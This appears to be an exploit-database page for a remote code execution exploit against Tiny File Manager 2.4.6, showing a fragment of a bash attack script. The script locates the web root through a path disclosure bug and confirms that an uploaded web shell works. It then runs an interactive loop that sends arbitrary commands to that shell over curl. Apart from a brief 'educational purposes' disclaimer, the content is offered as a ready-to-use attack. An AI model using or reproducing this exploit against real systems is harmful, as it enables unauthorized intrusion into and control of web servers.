Exploits / Vulnerability Discovered : 2022-03-16 |
Type : webapps |
Platform : php
This exploit / vulnerability Tiny file manager 2.4.6 remote code execution (rce) is for educational purposes only and if it is used you will do on your own risk!
if [ $webroot ]
then
printf "\n[*] Try to Leak Web root directory path \n\n"
printf "[+] Found WEBROOT directory for tinyfilemanager using full path disclosure bug : $webroot \n\n"
else
printf "[-] Can't find WEBROOT! Using default /var/www/html \n"
webroot="/var/www/html"
fi
}
if [ $? = 0 ]
then
printf "[+] File Upload Successful! \n"
else
printf "[-] File Upload Unsuccessful! Exiting! \n"
exit 1
fi
printf "[+] Checking for the shell \n"
curl ${WEB_URL}/${shell}?cmd=echo%20found -s | head -1 | grep "found" >/dev/null
if [ $? = 0 ]
then
printf "[+] Shell found ${WEB_URL}/$shell \n"
else
printf "[-] Shell not Found! It might be uploaded somewhere else in the server or got deleted. Exiting! \n"
exit 2
fi
printf "[+] Getting shell access! \n\n"
while true
do
printf "$> "
read cmd
curl ${WEB_URL}/$shell -s -X POST -d "cmd=${cmd}"
done
}
if [ $1 ] && [ $2 ] && [ $3 ]
then
check
log-in $1 $2 $3